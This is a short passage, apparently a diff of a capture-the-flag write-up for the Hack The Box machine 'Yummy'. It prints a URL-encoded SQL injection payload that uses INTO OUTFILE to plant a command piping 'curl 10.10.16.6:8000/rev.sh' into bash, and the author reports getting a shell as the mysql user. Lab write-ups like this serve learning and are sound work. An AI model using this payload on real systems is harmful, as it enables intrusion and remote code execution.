Hexphased/HTB-Writeups/Hard/Yummy/README.md

 aa&o=ASC%3b+select+"curl+10.10.16.6:8000/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b

-I put those into the url, right after the "?s=" string
+I put my urlencoded queries into the url, right after the "?s=" bit
 ```

 After an ungodly amount of troubleshooting these two queries, I got a shell as the mysql user!